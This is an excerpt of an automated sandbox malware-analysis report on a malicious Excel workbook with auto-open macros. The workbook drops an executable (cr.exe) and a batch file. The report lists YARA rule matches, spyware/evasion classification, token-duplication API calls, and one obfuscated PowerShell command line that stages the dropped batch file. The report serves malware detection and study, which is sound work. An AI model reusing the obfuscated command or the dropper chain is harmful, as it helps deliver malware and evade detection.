Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CCC5D 24_2_002CCC5D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00283CD3 24_2_00283CD3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BCF28 24_2_002BCF28
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00289F3B 24_2_00289F3B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00279FA2 24_2_00279FA2
Document contains embedded VBA macros
Source: ul9kpUwYel.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002D76B0 appears 153 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002BED89 appears 75 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0027F4FF appears 176 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFA10 appears 81 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0040F2AF appears 181 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043F7C0 appears 82 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFE70 appears 51 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 00467460 appears 172 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0044EB39 appears 77 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043FC20 appears 61 times
PE file contains more sections than normal
Source: sqlite3.dll.24.dr Static PE information: Number of sections : 18 > 10
PE file contains strange resources
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: ul9kpUwYel.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: classification engine Classification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW, 24_2_00437BD1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043433D CoCreateInstance, 24_2_0043433D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\251F0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD29.tmp Jump to behavior
Source: ul9kpUwYel.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................#.................F...............F.......A.....`IC........v.....................KJ.......).....l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................p.j....X|................T.............}..v.....|......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v............0...............h.`.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../................p.j......................T.............}..v.... .......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v....0....... ...............h.`....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;................p.j......................T.............}..v....h.......0.................`.............................